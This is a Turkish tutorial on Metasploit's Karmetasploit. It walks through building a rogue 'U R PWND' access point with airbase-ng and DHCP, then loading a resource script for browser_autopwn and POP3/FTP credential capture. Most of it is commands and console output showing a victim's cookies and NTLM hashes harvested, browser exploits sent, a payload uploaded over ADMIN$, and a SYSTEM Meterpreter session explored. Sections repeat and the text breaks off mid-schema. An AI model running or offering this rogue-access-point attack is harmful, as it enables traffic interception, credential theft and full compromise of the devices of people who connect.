MSF Karmetasploit
Bu yazıda, Metasploit içinde Karmetasploit hakkında bilgi vermeye çalışacağız. Genel olarak kurulum, ayarlarının yapılması ve örnek kullanımı göreceğiz.
Karmetasploit Nedir?
Karmetasploit, access point noktaları oluşturma, parola yakalama, bilgi toplama ve web tarayıcı saldırıları gerçekleştirilmek için kullanılan bir programdır. Kısaca, sahte bir modem veya access point oluşturursunuz. Bir takım kullanıcılar bu noktaya bağlanır. Siz de Karmetasploit sayesinde trafiği dinleyebilirsiniz.
Karmetasploit Ayarlama
Şimdi, Kali Linux içinde Karmetasploit’in kullanıma hazır hale getirilmesini görelim. İlk adımımız kontrol dosyasının indirme ile başlıyor.
root@kali:~# wget https://www.offensive-security.com/assets/images/2015/04/karma.rc_.txt
--2015-04-03 16:17:27-- https://www.offensive-security.com/downloads/karma.rc
Resolving www.offensive-security.com ***(*** www.offensive-security.com***)*** ... 198.50.176.211
Connecting to www.offensive-security.com ***(*** www.offensive-security.com***)*** |198.50.176.211|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1089 ***(*** 1.1K***)*** ***[*** text/plain]
Saving to: `karma.rc' 100%[======================================>] 1,089 --.-K/s in 0s
2015-04-03 16:17:28 (35.9 MB/s) - `karma.rc' saved ***[*** 1089/1089]
root@kali:~#
Oluşturacağımız Access Point’e kullanıcılar bağlandığında ne olması gerekir? Tabii ki bağlanan kullanıcıya bir IP adresi atanması beklenir. Bu durumda, Kali Linux işletim sistemini DHCP Sunucu olarak ayarlamalıyız.
Şimdi Kali Linux içine isc-dhcp-server
kuralım.
root@kali:~# apt update
...snip...
root@kali:~# apt -y install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~#
Kurulum tamamlandıktan sonra dhcpd.conf
dosyasında gerekli ayarları yapalım. dhscpd.conf
dosyasının bir yedeğini aldıktan sonra aşağıdaki örneğe benzer hale getirmelisiniz.
root@kali:~# cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 ***{***
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
***}***
root@kali:~#
Şimdi de bir kaç gerekliliği kuralım.
libsqlite3-dev Paketini Kuralım
root@kali:~# apt -y install libsqlite3-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
activerecord sqlite3 Ruby Modülleri Kuralım
root@kali:~# gem install activerecord sqlite3
Fetching: activerecord-5.0.0.1.gem ***(*** 100%***)***
Successfully installed activerecord-5.0.0.1
Parsing documentation ***for *** activerecord-5.0.0.1
Installing ri documentation ***for *** activerecord-5.0.0.1
Done installing documentation ***for *** activerecord after 7 seconds
Fetching: sqlite3-1.3.12.gem ***(*** 100%***)***
Building native extensions. This could take a ***while*** ...
Successfully installed sqlite3-1.3.12
Parsing documentation ***for *** sqlite3-1.3.12
Installing ri documentation ***for *** sqlite3-1.3.12
Done installing documentation ***for *** sqlite3 after 0 seconds
2 gems installed
root@kali:~#
root@kali:~# apt -y install libsqlite3-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~# gem install activerecord sqlite3
Fetching: activerecord-5.0.0.1.gem ***(*** 100%***)***
Successfully installed activerecord-5.0.0.1
Parsing documentation ***for *** activerecord-5.0.0.1
Installing ri documentation ***for *** activerecord-5.0.0.1
Done installing documentation ***for *** activerecord after 7 seconds
Fetching: sqlite3-1.3.12.gem ***(*** 100%***)***
Building native extensions. This could take a ***while*** ...
Successfully installed sqlite3-1.3.12
Parsing documentation ***for *** sqlite3-1.3.12
Installing ri documentation ***for *** sqlite3-1.3.12
Done installing documentation ***for *** sqlite3 after 0 seconds
2 gems installed
root@kali:~#
Artık Karmetsploit kullanmaya hazırız. Yapacağımız işlemler sırasıyla şöyle;
- Wireless kartı tespit edelim.
- wireless kartı monitor mod ile başlatalım.
- Yeni bir Kablosuz ağ başlatalım.
Wireless Arayüz Adını Tespit Edelim
root@kali:~# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
airmon-ng Başlatalım
root@kali:~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
***(*** mac80211 monitor mode vif enabled ***for*** ***[*** phy0]wlan0 on ***[*** phy0]wlan0mon***)***
***(*** mac80211 station mode vif disabled ***for*** ***[*** phy0]wlan0***)***
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill ***(*** some of***)*** them!
PID Name
693 dhclient
934 wpa_supplicant
Monitor Mod ile airbase-ng Başlatalım
root@kali:~# airbase-ng -P -C 30 -e "U R PWND" -v wlan0mon
For information, no action required: Using gettimeofday***()*** instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on wlan0mon to 1800
22:52:25 Access Point with BSSID 00:C0:CA:82:D9:63 started.
root@kali:~# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
root@kali:~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
***(*** mac80211 monitor mode vif enabled ***for*** ***[*** phy0]wlan0 on ***[*** phy0]wlan0mon***)***
***(*** mac80211 station mode vif disabled ***for*** ***[*** phy0]wlan0***)***
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill ***(*** some of***)*** them!
PID Name
693 dhclient
934 wpa_supplicant
Monitor Mod ile airbase-ng Başlatalım
root@kali:~# airbase-ng -P -C 30 -e "U R PWND" -v wlan0mon
For information, no action required: Using gettimeofday***()*** instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on wlan0mon to 1800
22:52:25 Access Point with BSSID 00:C0:CA:82:D9:63 started.
root@kali:~# airbase-ng -P -C 30 -e "U R PWND" -v wlan0mon
For information, no action required: Using gettimeofday***()*** instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on wlan0mon to 1800
22:52:25 Access Point with BSSID 00:C0:CA:82:D9:63 started.
Yukarıdaki çıktıda görüldüğü gibi at0
isminde yeni bir wireless arayüz başlatıldı. Şimdi, kendi bilgisayarımızı bu ağa dahil edelim.
root@kali:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@kali:~#
DHCP Sunucuyu başlatmak üzereyiz. Sunucu başladığında toplanan bilgilerin kayıt edileceği bir veri tabanı ihtiyacımız olacak. Bunun için önce bir veri tabanı oluşturalım ve DHCP sunuyu başlatalım.
root@kali:~# touch /var/lib/dhcp/dhcpd.leases
root@kali:~# dhcpd -cf /etc/dhcp/dhcpd.conf at0
Internet Systems Consortium DHCP Server 4.3.3
Copyright 2004-2015 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 0 leases to leases file.
Listening on LPF/at0/00:c0:ca:82:d9:63/10.0.0.0/24
Sending on LPF/at0/00:c0:ca:82:d9:63/10.0.0.0/24
Sending on Socket/fallback/fallback-net
root@kali:~# ps aux | grep ***[*** d]hcpd
root 2373 0.0 0.4 28448 9532 ? Ss 13:45 0:00 dhcpd -cf /etc/dhcp/dhcpd.conf at0
root@kali:~#
msfconsole
programını harici kaynak olarak, ilk başta indirdiğimiz karma.rc_.txt
dosyasını göstererek başlatalım.
root@kali:~# msfconsole -q -r karma.rc_.txt
***[*** ******* ***]*** Processing karma.rc_.txt ***for *** ERB directives.
resource ***(*** karma.rc_.txt***)>*** db_connect postgres:toor@127.0.0.1/msfbook
resource ***(*** karma.rc_.txt***)>*** use auxiliary/server/browser_autopwn
resource ***(*** karma.rc_.txt***)>*** setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST ***=>*** 10.0.0.1
resource ***(*** karma.rc_.txt***)>*** setg AUTOPWN_PORT 55550
AUTOPWN_PORT ***=>*** 55550
resource ***(*** karma.rc_.txt***)>*** setg AUTOPWN_URI /ads
AUTOPWN_URI ***=>*** /ads
resource ***(*** karma.rc_.txt***)>*** set LHOST 10.0.0.1
LHOST ***=>*** 10.0.0.1
resource ***(*** karma.rc_.txt***)>*** set LPORT 45000
LPORT ***=>*** 45000
resource ***(*** karma.rc_.txt***)>*** set SRVPORT 55550
SRVPORT ***=>*** 55550
resource ***(*** karma.rc_.txt***)>*** set URIPATH /ads
URIPATH ***=>*** /ads
resource ***(*** karma.rc_.txt***)>*** run
***[*** ******* ***]*** Auxiliary module execution completed
resource ***(*** karma.rc_.txt***)>*** use auxiliary/server/capture/pop3
resource ***(*** karma.rc_.txt***)>*** set SRVPORT 110
SRVPORT ***=>*** 110
resource ***(*** karma.rc_.txt***)>*** set SSL false
SSL ***=>*** false
resource ***(*** karma.rc_.txt***)>*** run
***[*** ******* ***]*** Auxiliary module execution completed
resource ***(*** karma.rc_.txt***)>*** use auxiliary/server/capture/pop3
resource ***(*** karma.rc_.txt***)>*** set SRVPORT 995
SRVPORT ***=>*** 995
resource ***(*** karma.rc_.txt***)>*** set SSL true
SSL ***=>*** true
resource ***(*** karma.rc_.txt***)>*** run
***[*** ******* ***]*** Auxiliary module execution completed
resource ***(*** karma.rc_.txt***)>*** use auxiliary/server/capture/ftp
***[*** ******* ***]*** Setup
resource ***(*** karma.rc_.txt***)>*** run
***[*** ******* ***]*** Listening on 0.0.0.0:110...
***[*** ******* ***]*** Auxiliary module execution completed
***[*** ******* ***]*** Server started.
msf auxiliary***(*** http***)*** ***>***
Artık oluşturduğumuz Acces Point üzerinden dinleme yapıyoruz. Bir kullanıcı kablosuz bağlantı ile bu noktaya bağlanır ve web üzerinden işlemler yapmaya başladıında tüm trafik veri tabanımıza kayıt edilmektedir.
Kayıt edilen paketlere bakalım.
msf auxiliary***(*** http***)*** ***>***
***[*** ******* ***]*** DNS 10.0.0.100:1276 XID 87 ***(*** IN::A www.msn.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1276 XID 87 ***(*** IN::A www.msn.com***)***
***[*** ******* ***]*** HTTP REQUEST 10.0.0.100 ***>*** www.msn.com:80 GET / Windows IE 5.01 cookies***=*** MC1***=*** V***=*** 3&GUID***=*** e2eabc69be554e3587acce84901a53d3; MUID***=*** E7E065776DBC40099851B16A38DB8275; mh***=*** MSFT; CULTURE***=*** EN-US; zip***=*** z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId***=*** 14; FlightId***=*** BasePage; hpsvr***=*** M:5|F:5|T:5|E:5|D:blu|W:F; hpcli***=*** W.H|L.|S.|R.|U.L|C.|H.; ushpwea***=*** wc:USNE0363; wpv***=*** 2
***[*** ******* ***]*** DNS 10.0.0.100:1279 XID 88 ***(*** IN::A adwords.google.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1279 XID 88 ***(*** IN::A adwords.google.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1280 XID 89 ***(*** IN::A blogger.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1280 XID 89 ***(*** IN::A blogger.com***)***
...snip...
***[*** ******* ***]*** DNS 10.0.0.100:1289 XID 95 ***(*** IN::A gmail.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1289 XID 95 ***(*** IN::A gmail.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1289 XID 95 ***(*** IN::A gmail.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1292 XID 96 ***(*** IN::A gmail.google.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1292 XID 96 ***(*** IN::A gmail.google.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1292 XID 96 ***(*** IN::A gmail.google.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1292 XID 96 ***(*** IN::A gmail.google.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1292 XID 96 ***(*** IN::A gmail.google.com***)***
***[*** ******* ***]*** Request '/ads' from 10.0.0.100:1278
***[*** ******* ***]*** Recording detection from User-Agent
***[*** ******* ***]*** DNS 10.0.0.100:1292 XID 96 ***(*** IN::A gmail.google.com***)***
***[*** ******* ***]*** Browser claims to be MSIE 5.01, running on Windows 2000
***[*** ******* ***]*** DNS 10.0.0.100:1293 XID 97 ***(*** IN::A google.com***)***
***[*** ******* ***]*** Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby/1.8/sqlite3
...snip...
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > linkedin.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > livejournal.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > monster.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Sending MS03-020 Internet Explorer Object Type to 10.0.0.100:1278...
[*] HTTP REQUEST 10.0.0.100 > slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] Received 10.0.0.100:1360 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
...snip...
[*] HTTP REQUEST 10.0.0.100 > www.monster.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Connecting to the ADMIN$ share...
[*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Regenerating the payload...
[*] Uploading payload...
[*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Created UxsjordQ.exe...
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Connecting to the Service Control Manager...
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Removing the service...
[*] Closing service handle...
[*] Deleting UxsjordQ.exe...
[*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Sending Access Denied to 10.0.0.100:1362
[*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Ignoring request from 10.0.0.100, attack already in progress.
[*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
[*] Sending stage (2650 bytes)
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=
[*] Sleeping before handling stage...
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to lsass.exe...
[*] Current server process: rundll32.exe (848)
[*] New server process: lsass.exe (232)
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)
msf auxiliary(http) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 10.0.0.1:45017 -> 10.0.0.100:1364
Yukarıdaki çıktılardan, kullanıcının bir çok adrese bağlandığını ve işlemler yaptığını görebiliriz. Bu çıktıları parça parça inceleyelim.
***[*** ******* ***]*** DNS 10.0.0.100:1284 XID 92 ***(*** IN::A ecademy.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1286 XID 93 ***(*** IN::A facebook.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1286 XID 93 ***(*** IN::A facebook.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1287 XID 94 ***(*** IN::A gather.com***)***
***[*** ******* ***]*** DNS 10.0.0.100:1287 XID 94 ***(*** IN::A gather.com***)***
Bu kısımda, kullanıcının bağlanmak istediği adreslere dair DNS Lookup işlemi yapılmaktadır.
***[*** ******* ***]*** HTTP REQUEST 10.0.0.100 ***>*** gmail.google.com:80 GET /forms.html Windows IE 5.01 cook
ies***=*** PREF***=*** ID***=*** 474686c582f13be6:U***=*** ecaec12d78faa1ba:TM***=*** 1241334857:LM***=*** 1241334880: S***=*** snePRUjY-zgcXpEV;NID***=*** 22***=*** nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6h I1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
***[*** ******* ***]*** HTTP REQUEST 10.0.0.100 ***>*** google.com:80 GET /forms.html Windows IE 5.01 cookies***=*** PREF***=*** ID***=*** 474686c582f13be6:U***=*** ecaec12d78faa1ba:TM***=*** 1241334857:LM***=*** 1241334880: S***=*** snePRUjY-zgcXpEV;NID***=*** 22***=*** nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4e FCH6hI1ae23g hwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
Here we can see Karmetasploit collecting cookie information from the client. This could be useful information to use ***in *** attacks against the user later on.
***[*** ******* ***]*** Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
***[*** ******* ***]*** Authenticating to 10.0.0.100 as TARGET\P0WN3D...
***[*** ******* ***]*** AUTHENTICATED as TARGET\P0WN3D...
***[*** ******* ***]*** Connecting to the ADMIN$ share...
***[*** ******* ***]*** Regenerating the payload...
***[*** ******* ***]*** Uploading payload...
***[*** ******* ***]*** Obtaining a service manager handle...
***[*** ******* ***]*** Creating a new service...
***[*** ******* ***]*** Closing service handle...
***[*** ******* ***]*** Opening service...
***[*** ******* ***]*** Starting the service...
***[*** ******* ***]*** Transmitting intermediate stager ***for *** over-sized stage...***(*** 191 bytes***)***
***[*** ******* ***]*** Removing the service...
***[*** ******* ***]*** Closing service handle...
***[*** ******* ***]*** Deleting UxsjordQ.exe...
***[*** ******* ***]*** Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
***[*** ******* ***]*** Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
***[*** ******* ***]*** Sending Access Denied to 10.0.0.100:1362
***[*** ******* ***]*** Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
***[*** ******* ***]*** Authenticating to 10.0.0.100 as TARGET\P0WN3D...
***[*** ******* ***]*** AUTHENTICATED as TARGET\P0WN3D...
***[*** ******* ***]*** Ignoring request from 10.0.0.100, attack already ***in *** progress.
***[*** ******* ***]*** Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
***[*** ******* ***]*** Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
***[*** ******* ***]*** Sending stage ***(*** 2650 bytes***)***
***[*** ******* ***]*** Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
***[*** ******* ***]*** HTTP REQUEST 10.0.0.100 ***>*** www.care2.com:80 GET / Windows IE 5.01 cookies***=***
***[*** ******* ***]*** Sleeping before handling stage...
***[*** ******* ***]*** HTTP REQUEST 10.0.0.100 ***>*** www.yahoo.com:80 GET / Windows IE 5.01 cookies***=***
***[*** ******* ***]*** HTTP REQUEST 10.0.0.100 ***>*** yahoo.com:80 GET / Windows IE 5.01 cookies***=***
***[*** ******* ***]*** Uploading DLL ***(*** 75787 bytes***)*** ...
***[*** ******* ***]*** Upload completed.
***[*** ******* ***]*** Migrating to lsass.exe...
***[*** ******* ***]*** Current server process: rundll32.exe ***(*** 848***)***
***[*** ******* ***]*** New server process: lsass.exe ***(*** 232***)***
***[*** ******* ***]*** Meterpreter session 1 opened ***(*** 10.0.0.1:45017 -> 10.0.0.100:1364***)***
Bu kısımda, kullanıcının parola bilgilerinin, cookie bilgilerinin toplandığı görülmektedir. Bu işlemlerin ardından, hedef bilgisayarda oturum açılmaya çalışılmaktadır.
Açılan Meterpreter oturumunda neler yapılabileceğine bakalım.
msf auxiliary***(*** http***)*** ***>*** sessions -i 1
***[*** ******* ***]*** Starting interaction with 1...
meterpreter ***>*** ps
Process list
***============***
PID Name Path
--- ---- ----
144 smss.exe \SystemRoot\System32\smss.exe
172 csrss.exe \??\C:\WINNT\system32\csrss.exe
192 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
220 services.exe C:\WINNT\system32\services.exe
232 lsass.exe C:\WINNT\system32\lsass.exe
284 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
300 KodakImg.exe C:\Program Files\Windows NT\Accessories\ImageVueKodakImg.exe
396 svchost.exe C:\WINNT\system32\svchost.exe
416 spoolsv.exe C:\WINNT\system32\spoolsv.exe
452 svchost.exe C:\WINNT\System32\svchost.exe
488 regsvc.exe C:\WINNT\system32\regsvc.exe
512 MSTask.exe C:\WINNT\system32\MSTask.exe
568 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
632 WinMgmt.exe C:\WINNT\System32\WBEM\WinMgmt.exe
696 TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
760 Explorer.exe C:\WINNT\Explorer.exe
832 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
848 rundll32.exe C:\WINNT\system32\rundll32.exe
860 VMwareUser.exe C:\Program Files\VMware\VMware Tool\VMwareUser.exe
884 RtWLan.exe C:\Program Files\ASUS WiFi-AP Solo\RtWLan.exe
916 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
952 SCardSvr.exe C:\WINNT\System32\SCardSvr.exe
1168 IEXPLORE.EXE C:\Program Files\Internet Explorer\IEXPLORE.EXE
meterpreter ***>*** ipconfig /all
VMware Accelerated AMD PCNet Adapter
Hardware MAC: 00:0c:29:85:81:55
IP Address : 0.0.0.0
Netmask : 0.0.0.0
Realtek RTL8187 Wireless LAN USB NIC
Hardware MAC: 00:c0:ca:1a:e7:d4
IP Address : 10.0.0.100
Netmask : 255.255.255.0
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
meterpreter ***>*** pwd
C:\WINNT\system32
meterpreter ***>*** getuid
Server username: NT AUTHORITY\SYSTEM
Gördüğünüz gibi, açılan oturumda neler yapılabileceğini örnek olarak gösterdik. Ayrıca bilgi toplama devam ettikçe inanılmaz çok bilgi kayıt edilecektir. Bunların kullanımı için veri tabanına bakmak ihtiyacı hissedebilirsiniz. Şimdi veri tabanı ile etkileşim sağlayalım.
Veri tabanı Ev klasöründe oluşturulmuştu. Aşağıdaki komut ile veri tabanına bağlanalım.
root@kali:~# sqlite3 karma.db
SQLite version 3.5.9
Enter ".help" ***for *** instructions
sqlite> .schema
CREATE TABLE hosts ***(***
'id' INTEGER PRIMARY KEY NOT NULL,
'created' TIMESTAMP,
'address' VARCHAR***(*** 16***)*** UNIQUE,
'comm' VARCHAR***(*** 255***)*** ,
'name' VARCHAR***(*** 255***)*** ,
'state' VARCHAR***(*** 255***)*** ,
'desc' VARCHAR***(*** 1024***)*** ,
'os_name' VARCHAR***(*** 255***)*** ,
'os_flavor' VARCHAR***(*** 255***)*** ,
'os_sp' VARCHAR***(*** 255***)*** ,
'os_lang' VARCHAR***(*** 255***)*** ,
'arch' VARCHAR***(*** 255***)***
***)*** ;
CREATE TABLE notes ***(***
'id' INTEGER PRIMARY KEY NOT NULL,
'created' TIMESTAMP,
'host_id' INTEGER,
'ntype' VARCHAR***(*** 512***)*** ,
'data' TEXT
***)*** ;
CREATE TABLE refs ***(***
'id' INTEGER PRIMARY KEY NOT NULL,
'ref_id' INTEGER,
'created' TIMESTAMP,
'name' VARCHAR***(*** 512***)***
***)*** ;
CREATE TABLE reports ***(***
'id' INTEGER PRIMARY KEY NOT NULL,
'target_id' INTEGER,
'parent_id' INTEGER,
'entity' VARCHAR***(*** 50***)*** ,
'etype' VARCHAR***(*** 50***)*** ,
'value' BLOB,
'notes' VARCHAR,
'source' VARCHAR,
'created' TIMESTAMP
***)*** ;
CREATE TABLE requests ***(***
'host' VARCHAR***(*** 20***)*** ,
'port' INTEGER,
'ssl' INTEGER,
'meth' VARCHAR***(*** 20***)*** ,
'path' BLOB,
'headers' BLOB,
'query' BLOB,
'body' BLOB,
'respcode' VARCHAR***(*** 5***)*** ,
'resphead' BLOB,
'response' BLOB,
'created' TIMESTAMP
***)*** ;
CREATE TABLE services ***(***
'id' INTEGER PRIMARY KEY NOT NULL,
'host_id' INTEGER,
'created' TIMESTAMP,
'port' INTEGER NOT NULL,
'proto' VARCHAR***(*** 16***)*** NOT NULL,
'state' VARCHAR***(*** 255***)*** ,
'name' VARCHAR***(*** 255***)*** ,
'desc' VARCHAR***(*** 1024***)***
***)*** ;
CREATE TABLE targets ***(***
'id' INTEGER PRIMARY KEY NOT NULL,
'host' VARCHAR***(*** 20***)*** ,
'port' INTEGER,
'ssl' INTEGER,
'selected' INTEGER
***)*** ;
CREATE TABLE vulns ***(***
'id' INTEGER PRIMARY KEY NOT NULL,
'service_id' INTEGER,
'created' TIMESTAMP,
'name' VARCHAR***(*** 1024***)*** ,
'data' TEXT
***)*** ;
CREATE TABLE vulns_refs ***(***
